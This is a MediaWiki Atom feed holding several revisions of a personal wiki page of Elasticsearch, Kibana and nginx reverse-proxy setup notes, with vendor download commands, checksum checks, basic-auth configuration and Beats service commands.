<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en-GB">
	<id>http://rasimsen.com/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Rasimsen</id>
	<title>OasisSoftTech.com - User contributions [en-gb]</title>
	<link rel="self" type="application/atom+xml" href="http://rasimsen.com/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Rasimsen"/>
	<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Special:Contributions/Rasimsen"/>
	<updated>2026-04-16T00:44:39Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.31.1</generator>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1120</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1120"/>
		<updated>2021-10-28T08:00:55Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* metricbeat - AWS Service Metrics monitoring */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
=Kibana Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -O https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# curl https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz.sha512 | shasum -a 512 -c -&lt;br /&gt;
# tar -xzf kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd kibana-7.15.1-linux-x86_64/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
start kibana&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/kibana&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/start-stop.html&lt;br /&gt;
&lt;br /&gt;
=NGINX Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
resource:&lt;br /&gt;
* https://blog.ruanbekker.com/blog/2017/09/16/nginx-reverse-proxy-for-elasticsearch-and-kibana-5-on-aws/ **&lt;br /&gt;
* https://burnhamforensics.com/2019/02/06/how-to-install-and-configure-nginx-for-kibana/&lt;br /&gt;
* https://www.cyberciti.biz/faq/amazon-linux-ami-install-linux-nginx-mysql-php-lemp/&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;nginx settings&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
to add server based auth:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# echo &amp;quot;kibanaadmin:`openssl passwd -apr1`&amp;quot; | sudo tee -a /etc/nginx/htpasswd.users&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
it will ask password, save it&lt;br /&gt;
&lt;br /&gt;
create a file. i.e. kibana.conf under /etc/nginx/conf.d/ with the following conf:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
server {&lt;br /&gt;
    listen 80;&lt;br /&gt;
&lt;br /&gt;
    server_name {{IP-or-DNS}}; # i.e. 217.138.24.32&lt;br /&gt;
&lt;br /&gt;
    auth_basic &amp;quot;Restricted Access&amp;quot;;&lt;br /&gt;
    auth_basic_user_file /etc/nginx/htpasswd.users;&lt;br /&gt;
&lt;br /&gt;
    location / {&lt;br /&gt;
        proxy_pass http://localhost:5601;&lt;br /&gt;
        proxy_http_version 1.1;&lt;br /&gt;
        proxy_set_header Upgrade $http_upgrade;&lt;br /&gt;
        proxy_set_header Connection &amp;#039;upgrade&amp;#039;;&lt;br /&gt;
        proxy_set_header Host $host;&lt;br /&gt;
        proxy_cache_bypass $http_upgrade;&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
create a file. i.e. elasticsearch.conf under /etc/nginx/conf.d/ with the following conf:&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
server {&lt;br /&gt;
    listen 81;&lt;br /&gt;
&lt;br /&gt;
    server_name {{IP-or-DNS}}; # i.e. 217.138.24.32&lt;br /&gt;
&lt;br /&gt;
    auth_basic &amp;quot;Restricted Access&amp;quot;;&lt;br /&gt;
    auth_basic_user_file /etc/nginx/htpasswd.users;&lt;br /&gt;
&lt;br /&gt;
    location / {&lt;br /&gt;
        proxy_pass http://localhost:9200;&lt;br /&gt;
        proxy_http_version 1.1;&lt;br /&gt;
        proxy_set_header Upgrade $http_upgrade;&lt;br /&gt;
        proxy_set_header Connection &amp;#039;upgrade&amp;#039;;&lt;br /&gt;
        proxy_set_header Host $host;&lt;br /&gt;
        proxy_cache_bypass $http_upgrade;&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
nginx start/stop&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# sudo service nginx start&lt;br /&gt;
# sudo service nginx status&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==functionbeat - AWS Cloudwatch integration==&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./functionbeat setup -e&lt;br /&gt;
# ./functionbeat -v -e -d &amp;quot;*&amp;quot; deploy cloudwatch-method-name&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==metricbeat - AWS Service Metrics monitoring==&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# doc : https://www.elastic.co/guide/en/beats/metricbeat/current/metricbeat-module-aws.html&lt;br /&gt;
&lt;br /&gt;
# sudo systemctl start metricbeat&lt;br /&gt;
# sudo systemctl enable metricbeat&lt;br /&gt;
# sudo systemctl status metricbeat&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1119</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1119"/>
		<updated>2021-10-27T16:33:59Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* NGINX Quick Notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
=Kibana Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -O https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# curl https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz.sha512 | shasum -a 512 -c -&lt;br /&gt;
# tar -xzf kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd kibana-7.15.1-linux-x86_64/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
start kibana&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/kibana&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/start-stop.html&lt;br /&gt;
&lt;br /&gt;
=NGINX Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
resource:&lt;br /&gt;
* https://blog.ruanbekker.com/blog/2017/09/16/nginx-reverse-proxy-for-elasticsearch-and-kibana-5-on-aws/ **&lt;br /&gt;
* https://burnhamforensics.com/2019/02/06/how-to-install-and-configure-nginx-for-kibana/&lt;br /&gt;
* https://www.cyberciti.biz/faq/amazon-linux-ami-install-linux-nginx-mysql-php-lemp/&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;nginx settings&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
to add server based auth:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# echo &amp;quot;kibanaadmin:`openssl passwd -apr1`&amp;quot; | sudo tee -a /etc/nginx/htpasswd.users&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
it will ask password, save it&lt;br /&gt;
&lt;br /&gt;
create a file. i.e. kibana.conf under /etc/nginx/conf.d/ with the following conf:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
server {&lt;br /&gt;
    listen 80;&lt;br /&gt;
&lt;br /&gt;
    server_name {{IP-or-DNS}}; # i.e. 217.138.24.32&lt;br /&gt;
&lt;br /&gt;
    auth_basic &amp;quot;Restricted Access&amp;quot;;&lt;br /&gt;
    auth_basic_user_file /etc/nginx/htpasswd.users;&lt;br /&gt;
&lt;br /&gt;
    location / {&lt;br /&gt;
        proxy_pass http://localhost:5601;&lt;br /&gt;
        proxy_http_version 1.1;&lt;br /&gt;
        proxy_set_header Upgrade $http_upgrade;&lt;br /&gt;
        proxy_set_header Connection &amp;#039;upgrade&amp;#039;;&lt;br /&gt;
        proxy_set_header Host $host;&lt;br /&gt;
        proxy_cache_bypass $http_upgrade;&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
create a file. i.e. elasticsearch.conf under /etc/nginx/conf.d/ with the following conf:&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
server {&lt;br /&gt;
    listen 81;&lt;br /&gt;
&lt;br /&gt;
    server_name {{IP-or-DNS}}; # i.e. 217.138.24.32&lt;br /&gt;
&lt;br /&gt;
    auth_basic &amp;quot;Restricted Access&amp;quot;;&lt;br /&gt;
    auth_basic_user_file /etc/nginx/htpasswd.users;&lt;br /&gt;
&lt;br /&gt;
    location / {&lt;br /&gt;
        proxy_pass http://localhost:9200;&lt;br /&gt;
        proxy_http_version 1.1;&lt;br /&gt;
        proxy_set_header Upgrade $http_upgrade;&lt;br /&gt;
        proxy_set_header Connection &amp;#039;upgrade&amp;#039;;&lt;br /&gt;
        proxy_set_header Host $host;&lt;br /&gt;
        proxy_cache_bypass $http_upgrade;&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
nginx start/stop&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# sudo service nginx start&lt;br /&gt;
# sudo service nginx status&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==functionbeat - AWS Cloudwatch integration==&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./functionbeat setup -e&lt;br /&gt;
# ./functionbeat -v -e -d &amp;quot;*&amp;quot; deploy cloudwatch-method-name&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==metricbeat - AWS Service Metrics monitoring==&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# doc : https://www.elastic.co/guide/en/beats/metricbeat/current/metricbeat-module-aws.html&lt;br /&gt;
# http://ec2-35-166-205-0.us-west-2.compute.amazonaws.com/app/home#/tutorial/awsMetrics&lt;br /&gt;
&lt;br /&gt;
# sudo systemctl start metricbeat&lt;br /&gt;
# sudo systemctl enable metricbeat&lt;br /&gt;
# sudo systemctl status metricbeat&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1118</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1118"/>
		<updated>2021-10-27T16:18:12Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* NGINX Quick Notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
=Kibana Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -O https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# curl https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz.sha512 | shasum -a 512 -c -&lt;br /&gt;
# tar -xzf kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd kibana-7.15.1-linux-x86_64/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
start kibana&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/kibana&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/start-stop.html&lt;br /&gt;
&lt;br /&gt;
=NGINX Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
resource:&lt;br /&gt;
* https://blog.ruanbekker.com/blog/2017/09/16/nginx-reverse-proxy-for-elasticsearch-and-kibana-5-on-aws/ **&lt;br /&gt;
* https://burnhamforensics.com/2019/02/06/how-to-install-and-configure-nginx-for-kibana/&lt;br /&gt;
* https://www.cyberciti.biz/faq/amazon-linux-ami-install-linux-nginx-mysql-php-lemp/&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;nginx settings&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
to add server based auth:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# echo &amp;quot;kibanaadmin:`openssl passwd -apr1`&amp;quot; | sudo tee -a /etc/nginx/htpasswd.users&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
it will ask password, save it&lt;br /&gt;
&lt;br /&gt;
create a file. i.e. kibana.conf under /etc/nginx/conf.d/ with the following conf:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
server {&lt;br /&gt;
    listen 80;&lt;br /&gt;
&lt;br /&gt;
    server_name {{IP-or-DNS}}; # i.e. 217.138.24.32&lt;br /&gt;
&lt;br /&gt;
    auth_basic &amp;quot;Restricted Access&amp;quot;;&lt;br /&gt;
    auth_basic_user_file /etc/nginx/htpasswd.users;&lt;br /&gt;
&lt;br /&gt;
    location / {&lt;br /&gt;
        proxy_pass http://localhost:5601;&lt;br /&gt;
        proxy_http_version 1.1;&lt;br /&gt;
        proxy_set_header Upgrade $http_upgrade;&lt;br /&gt;
        proxy_set_header Connection &amp;#039;upgrade&amp;#039;;&lt;br /&gt;
        proxy_set_header Host $host;&lt;br /&gt;
        proxy_cache_bypass $http_upgrade;&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
create a file. i.e. elasticsearch.conf under /etc/nginx/conf.d/ with the following conf:&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
server {&lt;br /&gt;
    listen 81;&lt;br /&gt;
&lt;br /&gt;
    server_name {{IP-or-DNS}}; # i.e. 217.138.24.32&lt;br /&gt;
&lt;br /&gt;
    auth_basic &amp;quot;Restricted Access&amp;quot;;&lt;br /&gt;
    auth_basic_user_file /etc/nginx/htpasswd.users;&lt;br /&gt;
&lt;br /&gt;
    location / {&lt;br /&gt;
        proxy_pass http://localhost:9200;&lt;br /&gt;
        proxy_http_version 1.1;&lt;br /&gt;
        proxy_set_header Upgrade $http_upgrade;&lt;br /&gt;
        proxy_set_header Connection &amp;#039;upgrade&amp;#039;;&lt;br /&gt;
        proxy_set_header Host $host;&lt;br /&gt;
        proxy_cache_bypass $http_upgrade;&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
nginx start/stop&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# sudo service nginx start&lt;br /&gt;
# sudo service nginx status&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1117</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1117"/>
		<updated>2021-10-27T16:17:43Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* NGINX Quick Notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
